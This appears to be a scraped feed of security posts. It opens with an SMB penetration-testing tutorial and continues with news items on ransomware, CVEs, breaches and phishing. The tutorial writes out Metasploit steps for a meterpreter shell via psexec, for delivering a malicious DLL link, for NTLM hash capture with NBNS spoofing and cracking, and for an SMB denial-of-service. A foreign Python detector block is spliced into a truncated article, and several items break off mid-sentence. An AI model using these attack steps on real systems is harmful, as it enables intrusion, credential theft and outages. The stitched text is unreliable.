Once you have SMB login credentials for the target machine, the following Metasploit module gives you a meterpreter session with access to the remote shell.

use exploit/windows/smb/psexec
msf exploit(windows/smb/psexec) > set rhost
msf exploit(windows/smb/psexec) > set smbuser raj
msf exploit(windows/smb/psexec) > set smbpass 123
msf exploit(windows/smb/psexec) > exploit

Once the commands run you will gain a meterpreter session on the victim’s PC and can access it as you wish.

Many scripts and tools are available for connecting to a remote machine over the SMB protocol; we have already written an article on connecting to SMB in multiple ways. Read the complete article here: “Multiple Ways to Connect Remote PC using SMB Port”.

Rundll32 One-liner to Exploit SMB

This module serves payloads via an SMB server and provides commands to retrieve and execute the generated payloads. Currently supports DLLs and Powershell.

use exploit/windows/smb/smb_delivery
msf exploit(windows/smb/smb_delivery) > set srvhost
msf exploit(windows/smb/smb_delivery) > exploit

This generates a link to a malicious DLL file; now send this link to your target and wait for his action.

As soon as the victim runs the above malicious command in the Run prompt or command prompt, we get a meterpreter session in Metasploit.

SMB Exploit via NTLM Capture

Another method to exploit SMB is NTLM hash capture: capturing the challenge-response password hashes of the SMB target machine.

This module provides a SMB service that can be used to capture the challenge-response password hashes of SMB client systems. Responses sent by this service have by default the configurable challenge string (\x11\x22\x33\x44\x55\x66\x77\x88), allowing for easy cracking using Cain & Abel, L0phtcrack or John the ripper (with jumbo patch). To exploit this, the target system must try to authenticate to this module.

use auxiliary/server/capture/smb
msf auxiliary(smb) > set srvhost
msf auxiliary(smb) > set johnpwfile /root/Desktop
msf auxiliary(smb) > exploit

Simultaneously, run the nbns_response module alongside the capture/smb module.

This module forges NetBIOS Name Service (NBNS) responses. It will listen for NBNS requests sent to the local subnet’s broadcast address and spoof a response, redirecting the querying machine to an IP of the attacker’s choosing. Combined with auxiliary/server/capture/smb or auxiliary/server/capture/http_ntlm it is a highly effective means of collecting crackable hashes on common networks. This module must be run as root and will bind to udp/137 on all interfaces.

msf auxiliary(nbns_response) > set spoofip
msf auxiliary(nbns_response) > set interface eth0
msf auxiliary(nbns_response) > exploit

As a result, this module generates a fake Windows security prompt on the victim’s system when it tries to connect to another system to access that system’s shared folders.

We had used nmap UDP and TCP port scans to identify open ports and protocols, and from the image you can observe that port 137 is open for the NetBIOS name service on our local machine.

Now when the victim tries to access our shared folder, he connects to us through his network IP; the image below demonstrates that the victim is connecting to the malicious IP. When the victim tries to access the shared folder, he is trapped by a fake Windows security alert prompt, which asks him to enter his username and password to access the shared folders.

Awesome!! Once again the attacker has captured the NTLMv2 hash; from the image you can see that here, too, the attacker captured:

Username: raj

Now use John the Ripper to crack the NTLMv2 hash by executing the command below:

john _smb_netntlmv2

From the image below you can confirm that we successfully retrieved the password 123 for user pentest by cracking the NTLMv2 hash.

To know more about it, read the complete article here: “4 Ways to Capture NTLM Hashes in Network”.

SMB DOS-Attack

An SMB DoS attack is another method available in the Metasploit framework.

This module exploits a denial-of-service flaw in the Microsoft Windows SMB client on Windows 7 and Windows Server 2008 R2. To trigger this bug, run this module as a service and force a vulnerable client to access the IP of this system as an SMB server. This can be accomplished by embedding a UNC path (\\HOST\share\something) into a web page if the target is using Internet Explorer, or into a Word document otherwise.

use auxiliary/dos/windows/smb/ms10_006_negotiate_response_loop
msf auxiliary(ms10_006_negotiate_response_loop) > set srvhost
msf auxiliary(ms10_006_negotiate_response_loop) > exploit

Now, when the victim tries to access a shared folder through our malicious IP, the target machine crashes; this attack is very effective.

Post Exploitation

This module will enumerate configured and recently used file shares.

use post/windows/gather/enum_shares
msf post(enum_shares) > set session 1
msf post(enum_shares) > exploit

As you can observe, it has shown three UNC paths that had been entered in the Run dialog.

File Sharing

smbserver

Now we will use a Python script that runs an SMB server on our Linux machine. This is useful when the target machine does NOT have a writeable share available. You can find this Python script on GitHub.

I copied the Python code from GitHub and pasted it into a text file named smbserver.py in the Desktop folder. Now execute the command given below to share the folder “raj”.

Since we know an SMB service is running on the host machine, and we are on a Windows platform, we can access its shared folder through the Run prompt.

Hence you can observe that we successfully accessed the folder “raj” and found two text files, user and pass, in it. In this way we can use the SMB Python script to share files between Windows and Linux machines.

smbclient

smbclient is a client that can ‘talk’ to an SMB/CIFS server. It offers an interface similar to that of the ftp program. Operations include getting files from the server to the local machine, putting files from the local machine onto the server, retrieving directory information from the server, and so on.

smbclient -L

smbclient //

As you can observe, with the help of smbclient we are able to view the shared folders of the victim’s machine. Moreover, we can use smbclient to share files on the network. Here you can observe that we logged in successfully with the credentials raj: 123 and transferred the file user.txt.

Author: Yashika Dhir is a passionate Researcher and Technical Writer at Hacking Articles. She is a hacking enthusiast.

The post SMB Penetration Testing (Port 445) appeared first on Hacking Articles.

Pylocky Unlocked: Cisco Talos releases PyLocky ransomware decryptor

This tool was developed by Mike Bautista.

PyLocky is a family of ransomware written in Python that attempts to masquerade as a Locky variant. This ransomware will encrypt all files on a victim machine before demanding that the user pay a ransom to gain access to their decrypted files. To combat this ransomware, Cisco Talos is releasing a free decryption tool. Because our tool requires the capturing of the initial PyLocky command and control (C2) traffic of an infected machine, it will only work to recover the files on an infected machine where network traffic has been monitored. If the initial C2 traffic has not been captured, our decryption tool will not be able to recover files on an infected machine. This is because the initial callout is used by the malware to send the C2 servers information that it uses in the encryption process.

When PyLocky executes, it generates a random user ID and password and gathers information about the infected machine using WMI wrappers. It also generates a random initialization vector, or IV, which is then base64 encoded and sent to the C2 server along with the system information the malware has gathered. After obtaining the absolute path of every file on the system, the malware then calls the encryption algorithm, passing it the IV and password. Each file is first base64-encoded before it is encrypted. The malware appends the extension ".lockedfile" to each file it encrypts - for example, the file "picture.jpg" would become "picture.jpg.lockedfile." The original file is then overwritten with the attacker's ransom note.

Example of a PyLocky ransom note.

Talos encourages users never to pay an attacker-demanded ransom, as this rarely results in the recovery of encrypted files. Rather, victims of this ransomware should restore from backups if their files cannot be decrypted. Just as in the June 2017 Nyetya attack, Talos has observed on numerous occasions that attackers who are demanding ransoms may have no way to communicate with victims to provide a decryptor. Our free decryption tool can be downloaded here.

Ways our customers can detect and block this threat are listed below.

Advanced Malware Protection (AMP) is ideally suited to prevent the execution of this malware.

Cisco Cloud Web Security (CWS) or Web Security Appliance (WSA) web scanning prevents access to malicious websites and detects malware used in these attacks.

Email Security can block malicious emails sent by threat actors as part of their campaign.

Network Security appliances such as Next-Generation Firewall (NGFW), Next-Generation Intrusion Prevention System (NGIPS), and Meraki MX can detect malicious activity associated with this threat.

Threat Grid helps identify malicious binaries and build protection into all Cisco Security products.

Umbrella, our secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs, and URLs, whether users are on or off the corporate network.

Open Source SNORT® Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.

What is Catphishing?

What is catphishing? It certainly isn’t Garfield lazily sitting in a canoe holding a fishing rod. Catphishing is when a fraudster fabricates an identity and tricks someone via cyber communication into a phony emotional or romantic relationship—usually for financial gain to the scammer—because eventually he’ll hit the victim up for money.

But another reason for catphishing is to lure someone into having a “relationship” with the scammer—to either ultimately publicly humiliate them with this information if they’re well-known, or to prove to a significant other that they’re capable of cheating. Not all catphishers are fraudulent. Sometimes, a person will catphish to catch a criminal.

One doesn’t get reeled in overnight, but the warning signs of the early stages of catphishing are clear: A too good to be true situation. The other party is very attractive (don’t bet for a second it’s really their photo). Another tell-tale sign that should make the alarm bells go off: This person comes out of thin air.

He…or she…will be reluctant to use the phone. Skype is out of the question: “I can’t figure out how to use it,” or, “It’s not compatible with my browser.” To maintain an air of legitimacy, the scammer will finally agree to meet you in person, making the plans sound like they’re running smoothly, but then at the last minute, must cancel the plans due to some crisis.

Some examples of real-life catphishing:

  • The DEA created the identity of a woman arrested on drug charges to nab drug dealers on Facebook.
  • Someone used the identity of a woman they personally knew, Ellie Flynn, to create phony accounts on Facebook, Twitter and Instagram. This fleabag even used “Ellie Flynn” and her photo on dating sites.

So the issue isn’t just the idea of you being tricked into a relationship by the catphisher, but the possibility that YOUR photo, name and other data can be used by the catphisher to commit this crime against someone else or to use it for dating sites. Are you pretty good-looking? Makes you wonder about the possibilities…catphishers DO peruse Facebook for those who are physically blessed.

It’s really difficult to discover that your image/name is being used by a catphisher. For example, suppose your name is Ashlee Patrick and you’re gorgeous. And someone named Ann Casey has decided to use your Facebook profile photo for a dating site she wants to register with, or maybe she wants to create a Facebook account.

How will you ever learn of this…unless, by freako chance, someone who knows you just happens to be on Ann Casey’s (if that’s even her real name) Facebook page or is communicating to her via the dating site?

At any rate, if you’re lucky enough to discover someone has stolen your picture for fraudulent purposes, you can report their phony account. Best ways to protect yourself?

  1. One option is to stop uploading pictures of yourself. This way you have more control over what’s out there.
  2. Use Google Reverse Image Search (https://www.google.com/imghp?gws_rd=ssl): simply upload a photo and Google will seek it out.

Robert Siciliano is a Security and Identity Theft Expert. He is the founder of Safr.me, a cybersecurity speaking and consulting firm based in Massachusetts. See him discussing internet and wireless security on Good Morning America.

Over 202 Million Chinese Job Seekers’ Details Exposed On the Internet

A cybersecurity researcher has discovered online a massive database containing records of more than 202 million Chinese citizens that remained accessible to anyone on the Internet without authentication until last week. The unprotected 854.8-gigabyte database was stored in an instance of MongoDB, a high-performance, cross-platform, document-oriented NoSQL database, hosted by an

CVE-2018-4032 (cleanmymac_x)

An exploitable privilege escalation vulnerability exists in the way the CleanMyMac X software improperly validates inputs. An attacker with local access could use this vulnerability to modify the file system as root. An attacker would need local access to the machine for a successful exploit.

How to create and open compressed files on iPhone, iPad

Many enterprises rely on zip files to exchange data, particularly confidential data. And compression helps keep information safe, even against inquisitive ads trackers lurking inside “free” email or online storage services. How do you handle these things on iPad or iPhone?

How to handle zip files on iPhone

While it isn’t especially obvious, iOS provides some limited features that let you archive and decompress zip files. You can even create a nice little Shortcut to do this for you:

  • Open Shortcuts, Tap Create Shortcut.
  • In the search bar, type Extract Archive: That shortcut should appear in the list below; tap it to add it to your workflow.
  • Returning to the search bar, type Save File. When it appears, tap it to add it to the workflow you are building.
  • Tap the switch button at top right of the shortcut name.
  • In the next pane, you can name the shortcut and give it an icon. The most important change you should make is to enable Show in Share Sheet (flick to green).
  • You can create a second Shortcut to make archives. Just type Make Archive to find the relevant flow and then add Save File and Show in Share Sheet as described above. Remember to give it a name, such as Make Archive.
  • Shortcuts can work with multiple compression formats, including .tar, .zip and .iso.


How edge computing can help secure the IoT

Data created by Internet of Things (IoT) sensors must be secured better, say some. A simple password-on-device solution is no longer sufficient thanks to increasing data protection regulations, a new public awareness of tracking, and hugely proliferating devices.

A new kind of architecture using Security Agents should be aggressively built into local routers and networks to handle IoT security and computation rather than offloading the number-crunching to a data center or the cloud, or indeed trying to perform it on the resource-limited IoT device, IEEE researchers say. In other words, IoT security should be handled at the network level rather than on the device for best results.


Emerson DeltaV

This advisory provides mitigation recommendations for an authentication bypass vulnerability in Emerson's DeltaV distributed control system workstation products.

Tridium Niagara Enterprise Security, Niagara AX, and Niagara 4

This advisory was originally posted to the HSIN ICS-CERT library on November 29, 2018, and is now being released to the NCCIC/ICS-CERT website. This advisory provides mitigation recommendations for a cross-site scripting vulnerability reported in the Tridium Niagara Enterprise Security, the Niagara AX, and the Niagara 4 products.

Neiman Marcus to Pay $1.5 Million in Settlement with 43 States for Data Breach

Neiman Marcus, the Dallas-based chain of luxury department stores, has agreed to pay $1.5 million in compensation to the 43 states affected by a 2013 data breach, announced Texas Attorney General Ken Paxton on Tuesday.

This sum is significantly lower than Target’s $18.5 million settlement following that retailer’s data breach in the same year, which was estimated to have cost $150 million.

A nationwide investigation concluded that, in 2013, a third party gained unauthorized access to 370,000 credit and debit cards used at 77 Neiman Marcus stores in multiple states. The breach went undetected for three months and was publicly announced in January 2014. Some 9,200 cards were used for illicit purposes, said Paxton.

“Texas law requires businesses to implement and maintain reasonable safeguards against cyberattacks to protect consumers’ personal information from unlawful use or disclosure,” he said. “I urge companies to evaluate whether they have in place a thorough and ongoing written information security program that serves to safeguard their customers’ information.”

The retailer also has to strengthen security and implement a clear policy to fend off attacks and protect customer data. An information security assessment and report from a third party is also required.

Neiman Marcus is not the only luxury department store to expose its customers’ financial data or personal information. In 2018, Saks Fifth Avenue, Saks Off 5th and Lord & Taylor stores also fell victim to unauthorized intrusions that affected their customers.

CVE-2019-5886 (shopxo)

An issue was discovered in ShopXO 1.2.0. In the application\install\controller\Index.php file, there is no validation lock file in the Add method, which allows an attacker to reinstall the database. The attacker can write arbitrary code to database.php during system reinstallation.

CVE-2019-5887 (shopxo)

An issue was discovered in ShopXO 1.2.0. In the UnlinkDir method of the FileUtil.php file, the input parameters are not checked, resulting in input mishandling by the rmdir method. Attackers can delete arbitrary files by using "../" directory traversal.

Reddit users locked out of accounts after ‘security concern’


A large number of Reddit users are being told that they will have to reset their passwords in order to regain access to their accounts following what the site is calling a “security concern.”

The lockout has occurred as Reddit’s security team investigates what appears to have been an attempt to log into many users’ accounts through a credential-stuffing attack.

Read more in my article on the Tripwire State of Security blog.

Google to ban harmful, intrusive web ads globally starting July 9

Beginning July 9, 2019, Chrome web browsers worldwide will expand user protections and stop showing disruptive and potentially harmful ads. The safeguards are in place for North America and Europe, but will expand globally come summer.

Google’s planned update for July 9 is driven by the Better Ads Standards developed by the Coalition for Better Ads, a consortium dedicated to improving the web advertising experience based on feedback from over 66,000 consumers worldwide.

The group has identified 12 advertising formats that users find intrusive, including pop-ups, auto-play ads, prestitial ads, and large sticky ads. Mobile users are particularly disrupted by full-screen scrollover ads, flashing animated ads, banners with an ad density larger than 30%, and others.

The Coalition for Better Ads this week announced plans to expand its standards beyond North America and Europe, and Google, being the commander of the Internet that it is, will follow suit with a special update for Chrome users.

“Following the Coalition’s lead, beginning July 9, 2019, Chrome will expand its user protections [globally] and stop showing all ads on sites in any country that repeatedly display these disruptive ads,” according to a post on the Chromium blog.

If you own a website, you want to be sure you don’t attract the referee’s ire come July 9, so consider reviewing your site status in the Ad Experience Report. The tool is designed to identify ad experiences that violate the Better Ads Standards. If the tool finds a violation, you can request a review of your site after you’ve fixed the issues. This not only helps your site, but also helps publishers in the long run, expanding their understanding of intrusive ad experiences.


Smashing Security #110: What? You can get paid to leave Facebook?


Twitter and the not-so-ethical hacking of celebrity accounts, study discovers how you can pay someone to quit Facebook for a year, and the millions of dollars you can make from uncovering software vulnerabilities.

All this and much more is discussed in the latest edition of the award-winning “Smashing Security” podcast by computer security veterans Graham Cluley and Carole Theriault, joined this week by Maria Varmazis.

Security newsround: January 2019

We round up interesting research and reporting about security and privacy from around the web. This month: the security year in review, resilience on rails, incidents in depth, phishing hooks millennials, Internet of Threats, and CISOs climbing the corporate ladder.

A look back at cybercrime in 2018

It wouldn’t be a new year’s email without a retrospective on major security incidents over the previous 12 months. Credit to CSO Online for assembling a useful overview of some of last year’s most common risks and threats. To beef up this resource, it sourced external research and stats, while adding plenty of links for further reading. Some of the highlights include the massive rise in cryptocurrency mining. “Coin miners not only slow down devices but can overheat batteries and sometimes render a device useless,” it warned.

The article also advises against posting mobile numbers on the internet, because criminals are finding ways to harvest them for various scams. CSO also advises organisations about knowing the value of their data in order to protect it accordingly. Threatpost has a handy at-a-glance guide to some of the big security incidents from the past year. Meanwhile, kudos to Vice Motherboard for its excellent ‘jealousy list’ which rounds up great hacking and security stories from 2018 that first appeared in other media outlets.

Luas security derails tram website

The new year got off to a bad start for Dublin’s tram operator Luas, after an unknown attacker defaced its website in a security incident. On January 2nd, the Luas site had this message: “You are hacked… some time ago i wrote that you have serious security holes… you didn’t reply… the next time someone talks to you, press the reply button… you must pay 1 bitcoin in 5 days… otherwise I will publish all data and send emails to your users.”

The incident exposed 3,226 user records, and Luas said they belonged to customers who had subscribed to its newsletter. News of the incident spread widely, possibly due to Luas’ high profile as a victim, or because of the cryptocurrency angle.

The tram service itself was not affected, nor was the company’s online payments system. While the website was down, Luas used its Twitter feed to communicate travel updates to the public, and warned people not to visit the site. Interviewed by the Irish Times, Brian Honan said the incident showed that many organisations tend to forget website security after launch. As we’ve previously blogged, it’s worth carrying out periodic vulnerability assessments to spot gaps that an attacker could exploit. With the Luas site not fully back six days later, Brian noted on Twitter that it’s important to integrate incident response with business continuity management.

One hacked laptop and two hundred solemn faces

When an employee of a global apparel company clicked on a link in a phishing email while connected to a coffee shop wifi, they unwittingly let a cybercrime gang onto their corporate network. Once in, the attackers installed Framework POS malware on the company’s retail server to steal credit card details. It’s one real-life example from CrowdStrike’s Cyber Intrusion Casebook. The report details various incident response cases from 2018. It also gives recommendations for organisations on steps to take to protect their critical data better. In addition to coverage in online news reports, the document is available as a free PDF on CrowdStrike’s site.

Examples like these show the need for resilience, which we’ve blogged about before. No security is 100 per cent perfect. But it shouldn’t follow that one gap in the defences brings the entire wall crumbling down.

Digitally savvy, yes. Security savvy, not so much

Speaking of phishing, a new survey has found that digital natives are twice as likely to have fallen victim to a phishing scam as their older – sorry, we mean more experienced – colleagues. Some 17 per cent in the 23-41 age group clicked on a phishing link, compared to 6 per cent of those aged 42-53 and 7 per cent of those aged 54+. The findings suggest a gap between perception and reality.

Out of all the age groups, digital natives were the most confident in their ability to spot a scam compared to their senior peers. Yet the 14 per cent of digital natives who weren’t as sure of their ability to spot a phish was strikingly close to the percentage in the same age bracket who had fallen for a phishing email. The survey by Censuswide for Datapac found that 14 per cent of Irish office workers – around 185,000 people – have been successfully phished at some stage.

OWASP’s IoT hit list

Is your organisation planning an Internet of Things project in 2019? Then you might want to point the project team in OWASP’s direction first. The group’s IoT project aims to improve understanding of the security issues around embedding sensors in, well, anything. To that end, the group has updated its top 10 list for IoT. The risks include old reliables like weak, guessable passwords, outdated components, insecure data transfer or storage, and lack of physical hardening. The full list is here.

The number’s up for CISO promotions

Why do relatively few security professionals ascend to the highest levels of business? That’s the provocative question from Raj Samani, chief scientist with McAfee. In an op-ed for Infosecurity Magazine, Samani argues that security hasn’t yet communicated its value to the business in an identifiable way. Proof of this is the fatigue or indifference over ever-mounting numbers of data breaches. Unlike a physical incident like a car accident where the impact is instantly visible, security incidents don’t have the same obvious cause and effect.

“The inability to determine quantifiable loss means that identifying measures to reduce risk are merely estimated at best. Moreover, if the loss is rarely felt, then the value of taking active steps to protect an asset can simply be overlooked,” Samani writes. “We can either bemoan the status quo or identify an approach that allows us to articulate our business value in a quantifiable way.”

The post Security newsround: January 2019 appeared first on BH Consulting.

Neiman Marcus to Pay $1.5 Million under Data Breach Settlement

Neiman Marcus Group, Inc. has agreed to pay $1.5 million as part of a settlement for an earlier data breach that exposed customers’ information. Ken Paxton, Attorney General of Texas, announced on 8 January that he and his fellow Attorneys General from 42 other states will enter into the $1.5 million settlement with Neiman Marcus. […]

The post Neiman Marcus to Pay $1.5 Million under Data Breach Settlement appeared first on The State of Security.

New Systemd Privilege Escalation Flaws Affect Most Linux Distributions

Security researchers have discovered three vulnerabilities in Systemd, a popular init system and service manager for most Linux operating systems, that could allow unprivileged local attackers or malicious programs to gain root access on the targeted systems. The vulnerabilities, assigned CVE-2018-16864, CVE-2018-16865, and CVE-2018-16866, actually reside in the "systemd-journald" service

Security Vulnerabilities in Cell Phone Systems

Good essay on the inherent vulnerabilities in the cell phone standards and the market barriers to fixing them.

So far, industry and policymakers have largely dragged their feet when it comes to blocking cell-site simulators and SS7 attacks. Senator Ron Wyden, one of the few lawmakers vocal about this issue, sent a letter in August encouraging the Department of Justice to "be forthright with federal courts about the disruptive nature of cell-site simulators." No response has ever been published.

The lack of action could be because it is a big task -- there are hundreds of companies and international bodies involved in the cellular network. The other reason could be that intelligence and law enforcement agencies have a vested interest in exploiting these same vulnerabilities. But law enforcement has other effective tools that are unavailable to criminals and spies. For example, the police can work directly with phone companies, serving warrants and Title III wiretap orders. In the end, eliminating these vulnerabilities is just as valuable for law enforcement as it is for everyone else.

As it stands, there is no government agency that has the power, funding and mission to fix the problems. Large companies such as AT&T, Verizon, Google and Apple have not been public about their efforts, if any exist.

Facebook Accused of Violating Vietnam’s Cyber Law

Vietnam’s controversial cybersecurity law that tightens government control of the online environment just came into effect on Jan. 1 and it’s already claiming its first victim, writes the Financial Times.

On Tuesday, the communist country accused Facebook of not complying with its new law by refusing to immediately delete fan pages with content the government considers defamatory. According to Vietnam’s Authority of Broadcasting and Electronic Information (ABEI), Vietnamese account holders freely published “slanderous content, anti-government sentiment and libel and defamation of individuals, organizations and state agencies.”

The cybersecurity law, passed in June 2018, forms part of Vietnam’s strategy to tighten media control and restrict free speech online.

“This decision has potentially devastating consequences for freedom of expression in Vietnam,” Amnesty International stated at the time. “In the country’s deeply repressive climate, the online space was a relative refuge where people could go to share ideas and opinions with less fear of censure by the authorities.”

Citing a Vietnamese market research report, the government body accuses Facebook of allowing advertising for scams and fake or illegal products. “The Vietnamese report claimed some $235 million was spent on Facebook ads in 2018, with $152.1 million going to Google,” writes TechCrunch.

As a result, Vietnam wants to penalize Facebook by taxing advertising revenue.

“We have a clear process for governments to report illegal content to us, and we review all these requests against our terms of service and local law,” Facebook responded. “We are transparent about the content restrictions we make in accordance with local law in our Transparency Report.”

Vietnamese authorities requested information on suspicious accounts, but Facebook refused to hand over user data, as it would violate community standards.

Hackers Using Zero-Width Spaces to Bypass MS Office 365 Protection

Security researchers have been warning about a simple technique that cybercriminals and email scammers are already using in the wild to bypass security features of Microsoft Office 365, including Safe Links, which is designed to protect users from malware and phishing attacks. Safe Links has been included by Microsoft in Office 365 as part of its ATP (Advanced Threat Protection
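The defensive side of the technique above, as an added example that is not code from the original article, from Microsoft or from the researchers it cites: a link scanner that pattern-matches the raw text will miss a URL whose characters are interleaved with zero-width code points, because the raw string no longer looks like a link. Normalising the text (dropping every Unicode format-category character) before matching restores the scanner's view, and the mismatch between the naive and normalised results is itself a useful detection signal. The sample message body and the list of code points are constructed for this example.

```python
"""Detect and normalise zero-width characters hidden inside URLs.

Added example, not code from the article or from any vendor product.
A naive regex that looks for "https://..." fails when zero-width code
points are interleaved in the link; stripping Unicode category "Cf"
(format characters, which covers U+200B, U+200C, U+200D, U+2060 and
U+FEFF) before matching restores the link.
"""
import re
import unicodedata

# Naive link pattern: needs a contiguous "http" / "https" scheme.
URL_RE = re.compile(r"https?://[^\s<>\"']+", re.IGNORECASE)


def find_zero_width(text: str) -> list:
    """Return (index, code point name) for every format-category character."""
    return [
        (i, unicodedata.name(ch, "UNKNOWN"))
        for i, ch in enumerate(text)
        if unicodedata.category(ch) == "Cf"
    ]


def strip_zero_width(text: str) -> str:
    """Drop every Unicode format character (category Cf) from the text."""
    return "".join(ch for ch in text if unicodedata.category(ch) != "Cf")


def extract_urls(text: str, normalise: bool = True) -> list:
    """URLs found in text. With normalise=False the regex sees the raw
    string, which is what a scanner that does no normalisation would see."""
    if normalise:
        text = strip_zero_width(text)
    return URL_RE.findall(text)


def scan_message(body: str) -> dict:
    """Report hidden characters and compare the naive and normalised views.

    A message is flagged when it carries format characters AND the two
    views disagree, i.e. a link only appears after normalisation."""
    hidden = find_zero_width(body)
    naive = extract_urls(body, normalise=False)
    normalised = extract_urls(body, normalise=True)
    return {
        "hidden_chars": len(hidden),
        "urls_naive": naive,
        "urls_normalised": normalised,
        "suspicious": bool(hidden) and naive != normalised,
    }


# Constructed sample: the scheme and the host are split by zero-width
# characters (U+200B and U+200C), so the raw text contains no "https://".
SAMPLE_BODY = (
    "Your mailbox is almost full. Review it at "
    "ht\u200btps://ma\u200cil-quota-review.example\u200b.com/login\n"
    "Regards, IT"
)


if __name__ == "__main__":
    report = scan_message(SAMPLE_BODY)
    for key, value in report.items():
        print(f"{key}: {value}")
```

The naive pass returns no links for the sample while the normalised pass returns one, which is exactly the gap a filter that does not normalise would fall into; stripping category `Cf` is broader than the five code points usually named, so a production filter should log what it removed rather than silently drop it.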

The world’s southernmost security conference

When asked about his best race, Ayrton Senna replied that it was when he raced karts. For him it was the best because it was only for the sake of sport and free from commercial sponsoring and commercial interests. I have this same feeling about computer security conferences, because they attract people who really seek knowledge, both to receive and to share it.

In November I had the privilege of participating in a conference that can rightfully be labelled the world’s southernmost. It is called “Patagonia Hacking” and it is organized in the Chilean city of Punta Arenas: https://www.patagoniasec.cl

The event takes place over two days – the first is dedicated to workshops, and the second is for presentations to the attendees. On my part, I had the opportunity to present two topics, one each day. On the day dedicated to talks, my topic was the “Black Box” attacks against financial institutions in Latin America – a phenomenon that has become a fearful reality for the banks in the region.

Although the event took place in a remote city, attendees included enthusiasts from all over the world. There were also some Latin American speakers.

Despite the low temperatures and strong winds, the event’s welcome was very warm. It was very pleasant meeting the region’s new experts and sharing with them during those busy days.

The third edition of the event took place this year. If you plan to participate next year, apart from the conference, you should try the traditional lamb meat, Calafate beer and Calafate’s pisco sour, as well as making time to visit the Strait of Magellan Park which includes Fort Bulnes.

P.S. A curious fact – it seems that the southernmost city with Uber also happens to be Punta Arenas.

Google DNS Service Now Supports DNS-over-TLS Security

Almost every activity on the Internet starts with a DNS query, a key function of the Internet that works as the Internet's directory, where your device looks up the server IP address after you enter a human-readable web address (e.g., thehackernews.com). Since DNS queries are sent in clear text over UDP or TCP without encryption, the information can reveal not only what websites an

Turns Out Kaspersky Labs Helped FBI Catch Alleged NSA Leaker

Remember "The Shadow Brokers" and the arrest of a former NSA contractor accused of stealing 50 Terabytes of top secret documents from the intelligence agency? It turns out that Kaspersky Lab, which has been banned from US government computers over spying fears, was the one who tipped off the U.S. government and helped the FBI catch NSA contractor Harold T. Martin III, unnamed sources familiar